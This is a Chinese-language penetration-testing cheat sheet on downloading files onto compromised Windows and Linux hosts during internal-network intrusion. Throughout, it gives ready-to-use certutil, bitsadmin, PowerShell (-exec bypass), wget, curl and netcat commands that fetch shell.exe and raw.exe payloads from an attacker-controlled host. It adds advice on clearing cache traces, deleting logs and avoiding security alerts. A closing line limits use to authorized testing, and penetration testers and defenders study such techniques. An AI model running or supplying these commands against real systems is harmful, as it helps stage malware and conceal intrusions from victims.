内网渗透文件下载技术详解

1. Windows系统文件下载方法

1.1 certutil工具

certutil是Windows系统自带的证书工具，可用于文件下载：

基本下载命令

certutil -urlcache -split -f http://192.168.66.245:8000/shell.exe

指定保存文件名

certutil -urlcache -split -f http://192.168.66.245:9000/shell.exe test.exe

注意事项

• certutil会在缓存目录保存副本：
  %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

• 清理缓存方法：

  certutil -urlcache -split -f http://192.168.66.245:9000/shell.exe delete
  

• 查看缓存内容：

  certutil.exe -urlcache *
  

1.2 bitsadmin工具

适用于Windows7及以上系统版本：

基本下载命令

bitsadmin /rawreturn /transfer getfile http://192.168.66.245/raw.exe C:\Users\mssql\Desktop\asd\cc.exe

替代命令格式

bitsadmin /rawreturn /transfer getpayload http://192.168.66.245/raw.exe C:\Users\mssql\Desktop\asd\dd.exe

带进度条下载

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.66.245/raw.exe" "C:\Users\mssql\Desktop\asd\ee.exe"

设置下载优先级

bitsadmin /setpriority high

可用优先级：FOREGROUND | HIGH | NORMAL | LOW

1.3 PowerShell下载

Windows7及以上系统默认自带PowerShell：

基本下载命令

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.66.245/raw.exe','C:\Users\mssql\Desktop\a.exe')

简化版

powershell (new-object Net.WebClient).DownloadFile('http://192.168.66.245/raw.exe','C:\Users\mssql\Desktop\b.exe')

2. Linux系统文件下载方法

2.1 wget命令

wget http://192.168.66.245/raw.exe

2.2 curl命令

curl -O http://192.168.66.245/raw.exe

3. 使用nc(netcat)传输文件

3.1 接收端设置

nc.exe -l -p 9999 > xxxxxx.exe

3.2 发送端命令

nc64.exe 192.168.5.132 9999 < raw.exe

4. 渗透测试注意事项

1. 使用certutil下载后务必清理缓存痕迹
2. 不同Windows版本支持的工具不同：
   • certutil：所有Windows版本
   • bitsadmin：Windows7及以上
   • PowerShell：Windows7及以上默认安装
3. 内网渗透时注意选择合适的工具，避免触发安全警报
4. 文件传输完成后应删除临时文件和日志

5. 工具选择建议

1. 优先使用系统自带工具(certutil/bitsadmin/PowerShell)
2. 大文件传输考虑使用bitsadmin并设置高优先级
3. 跨平台环境使用wget/curl
4. 特殊情况下使用nc进行点对点传输

以上方法适用于内网渗透测试中的文件下载需求，实际使用时应遵守相关法律法规，仅在授权范围内使用。